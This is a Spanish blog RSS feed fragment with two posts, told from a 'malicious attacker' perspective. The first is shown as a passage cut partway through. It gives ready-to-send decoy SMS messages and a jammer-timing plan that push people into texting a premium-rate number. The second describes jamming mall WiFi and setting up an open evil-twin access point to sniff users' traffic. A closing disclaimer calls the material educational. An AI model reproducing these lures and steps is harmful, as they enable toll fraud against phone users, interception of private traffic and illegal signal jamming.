<p>Sr usuario la señal de su dispositivo movil se ha desactivado por inconvenientes, esta sera habilitada dentro de las proximas 72 hrs, si su linea es de vital importancia debido a su ocupacion, puede restaurarla enviando un SMS con la palabra RESTAURAR al 6666</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p><strong>Nota:</strong> donde 6666 es nuestro numero de servicio SMS el cual es de un costo altisimo&#8230;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Una vez enviado los SMS SEÑUELO a todos los de nuestra lista de objetivos a la redonda, estos o algunos.. intentaran la restauracion de su servicio.</p>
<p><strong>La pregunta ahora es&#8230; serà que van a caer?</strong></p>
<p>Primero que todo pensemos&#8230; El escenario del Puesto de llamadas fue planteado por las siguientes razones&#8230;</p>
<p><strong>1-</strong> Si el encargado tiene su bluetooth activado y recibe esto que pasa?</p>
<p><strong>a-</strong>casi un 90 % seguro que lo hace, por que su ocupacion esta siendo suspendida la cual le generaria perdidas&#8230;</p>
<p><strong>b-</strong> la multitud de gente en espera lo pone en un momento de poco pensar y de mucho hacer, asi que la solucion esta en el sms que se le envio y asi podra seguir y dejar a sus clientes satisfechos</p>
<p><strong>2-</strong> Que pasa si el encargado no esta con bluetooth activo?<br />
<strong>a-</strong> para eso dige que hay que sacar la lista de objetivos&#8230;por que de seguro muchos tienen llamadas importantes que hacer y no dudaran ni un min para hacer un pronto reestablecimiento de su servicio.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Una vez que estos reciban los SMS señuelos debemos apagar nuestro inhibidor por unos segundos, muy recomendable unos 30 Seg&#8230; y enviar un nuevo SMS que diga..</p>
<p>Letter Ejemplo 2:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Su servicio esta en mantenimiento y se generara una intermitencia en su señal, si desea restaurar su servicio lo mas pronto posible, favor enviar un SMS con la palabra RESTAURAR al numero 6666.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
<em>Se desactiva el inhibidor&#8230;.</em></p>
<p>Rectificando mucho el atacante en su Servicio de SMS podria notar si aun los dispositvos objetivos no han dado respuesta&#8230;cuando este note si se ha logrado captar una gran suma.. ya deberia dejar de activar su inhibidor y dejar todo estable.</p>
<p><strong>Nota:</strong> El estado de intermitencia de un inhibidor se hace con el objetivo de persistir y que se haga mas tedioso para los usuarios.. con el fin de que su desespero los haga tratar de restablecer su servicio lo mas pronto posible mediante las instrucciones que se le dieron en el sms.</p>
<p><strong>Conclusion:</strong> Este articulo fue creado desde la perspectiva de un atacante malicioso, sin ningun motivo de orientar al robo y con la simple gracia de enseñar y notificar las infinidades de tecnicas que se pueden usar en este &#8220;Escenario&#8221; tan inseguro!</p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/inhibidores-de-senal-2da-parte-el-escenario-perfecto-gsm-bluetooth.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Inhibidores de Señal [El escenario perfecto] [WIFI]</title>
		<link>http://insecure.org.mx/inhibidores-de-senal.html</link>
		<comments>http://insecure.org.mx/inhibidores-de-senal.html#comments</comments>
		<pubDate>Fri, 09 Dec 2011 06:07:11 +0000</pubDate>
		<dc:creator>MaztoR</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Redes]]></category>
		<category><![CDATA[wardriving]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=300</guid>
		<description><![CDATA[[Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).] Este articulo se me ocurrio hacerlo por un &#8220;Recuerdo de viejos tiempos&#8221;; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia&#8230; logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!! Pero que era exactamente esa [...]]]></description>
			<content:encoded><![CDATA[<p>[<em>Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).</em>]</p>
<div><a href="http://3.bp.blogspot.com/-ZBQIdCaO2Ck/TuAqKYCbDnI/AAAAAAAAAGI/421EQoETw4w/s1600/inhi.png"><img class="aligncenter" src="http://3.bp.blogspot.com/-ZBQIdCaO2Ck/TuAqKYCbDnI/AAAAAAAAAGI/421EQoETw4w/s320/inhi.png" alt="" width="320" height="232" border="0" /></a></div>
<p>Este articulo se me ocurrio hacerlo por un &#8220;Recuerdo de viejos tiempos&#8221;; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia&#8230; logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!!</p>
<p><strong>Pero que era exactamente esa pequeña caja negra?</strong></p>
<p>Esta pequeña caja era un <strong>INHIBIDOR DE SEÑAL</strong> que fue el resultado de unas pocas clases de electronica que habia tomado un compañero. Era demasiado rustico y no carecia de una funcionalidad excelente debido a que era casera y no se tenian unos masteriales de alta calidad, pero te preguntaras&#8230;</p>
<p><strong>Que es un inhibidor o perturbador de señal?</strong></p>
<p><em>Segun wikipedia</em></p>
<p>En Telecomunicación, un perturbador, también denominado inhibidor es un Dispositivo electrónico que impide o dificulta las transmisiones radioeléctricas en un determinado rango de frecuencias mediante la emisión de una señal de mayor potencia que la del emisor que quiere transmitir.</p>
<p>Se compone básicamente de un generador de señal y un transmisor. El primero genera una señal que es enviada a través del segundo con una potencia determinada según la necesidad. Esta señal carece de información útil, únicamente es una señal generada por un oscilador o generador de onda. Ésta, al emitirse con mayor potencia que los sistemas de transmisión a interferir, las suprime, evitando que emisor y receptor establezcan la comunicación.</p>
<p>Se utiliza principalmente por motivos de seguridad o con intenciones de sabotaje.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><em>Segun MaztoR</em></p>
<p>Dispositivo que no permite un transcurso de señal, impidiendo, dificultando y/o creando difusion en el receptor por que esta ocupa esa frecuencia con otra señal mucho mas potente. <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  (corregirme si estoy mal)</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Bueno iniciemos la objetividad de este articulo&#8230;</strong></p>
<p>ya sabemos perfectamente que es un Inhibidor de señal (si no te quedo claro para eso esta google XD) pero ahora debemos plantear un &#8220;<strong>ESCENARIO PERFECTO</strong>&#8221; desde la perspectiva de un &#8220;Atacante Malicioso&#8221; la cual consta de reemplazos o sustituciones de puntos de acceso para asi el atacante obtener un &#8220;beneficio&#8221; y una administracion de conexiones o host vibrantes en el punto &#8220;CLON&#8221; que logicamente sera el que nosotros pondremos de señuelo.</p>
<p><strong>primero que nada cabe hay que aclarar ciertos puntos</strong>:</p>
<p><strong>1-</strong> Un inhibidor tiene un rango de X MTS/KMTS definidos a la redonda (todo depende del tipo de inhibidor)</p>
<p><strong>2-</strong> Aqui se planteara un escenario usando inhibidores portables y de poco alcance (ya sabran el porque)</p>
<p>Primer Escenario&#8230; [<em>El Centro Comercial</em>]<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<div><a href="http://2.bp.blogspot.com/-RszTT463bPM/TuAiGLKP56I/AAAAAAAAAF8/I7eG0fZL8fk/s1600/inhibidor.png"><img class="aligncenter" src="http://2.bp.blogspot.com/-RszTT463bPM/TuAiGLKP56I/AAAAAAAAAF8/I7eG0fZL8fk/s320/inhibidor.png" alt="" width="320" height="320" border="0" /></a></div>
<p>Bueno viendo bien el grafico se puede notar que lo que hacemos es dejar a un cierto grupo de personas sin recepcion de señal y creando un nuevo punto de acceso con un nombre COPIA para hacer confusion en los usuario, copn el objetivo de que intente un reconexion buscando en su lista de detectados (logico no saldra nada por que la zona esta inhibida) pero dejamos el inhibidor unos 10 min para que los usuarios pierdan la total conexion WIFI por que si lo hacemos en fraccion de segundos no habria desconexion debido a que hace reconexion simultanea, al estar seguros de una desconexion total desactivamos el inhibidor y hacemos que nuestro punto de acceso este lo mas cerca posible con el objetivo de que elijan el punto &#8220;CLON&#8221; con mas señal, osea el de nosotros por la cercania no les parece?&#8230;.</p>
<p><strong>Nota</strong>: hay muchas formas de hacer puntos de acceso, te doy algunas ideas&#8230; usando tus Dispositivos Iphone, ipad por la portabilidad, con portatiles + modems etc.</p>
<p>Bueno ya teniendo un punto de acceso propio podemos hacer una administracion de nuestros host activos, pudiendo interceptar su trafico, sniffearlos o como le quieras hacer <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Ahora te preguntaras.. no es mas facil conectarse al punto principal (original) y evitar todo este proceso?</strong></p>
<p><strong>Veamos no escribo cosas por nada jajaja, que tal si la clave no la sabemos?</strong></p>
<p><em>Repuesta</em><br />
creamos el punto de acceso sin clave y que sea CLON, para una conexion mas directa para los usuarios.. por que si le ponemos clave&#8230; ellos no la sabria debido a que pondrian la clave que ellos saben, pero como no la sabemos hay perdida&#8230;</p>
<p><strong>De que sirve si las pcs pueden tener palomeada la opcion de &#8220;Conectarse automaticamente&#8221;</strong></p>
<p><em>Respuesta</em></p>
<p>Simple con ingenio se logra que conecten al punto &#8220;CLON&#8221;.. haber te doy una idea..</p>
<p>PUNTO ORIGINAL LLAMADO= CENTROCOMERCIAL<br />
PUNTO CLON LLAMADO= CENTROCOMERCIAL ESTABLE</p>
<p>ponemos el inhibidor en intermitencia para que haga una especie de prendido/apagado y los usuarios tengan una pesima señal&#8230; asi que veran el punto de wifi &#8220;ESTABLE&#8221;<br />
y decidiran usarlo <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  (Este se prueba en intervalos para no perjudicar las conexiones a nuestro punto de acceso)</p>
<h1>Este es realmente un Escenario perfecto?</h1>
<p><em>La segunda parte tratara sobre inhibidores de señal telefonica GSM, Saludos y happy Attack?</em></p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/inhibidores-de-senal.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

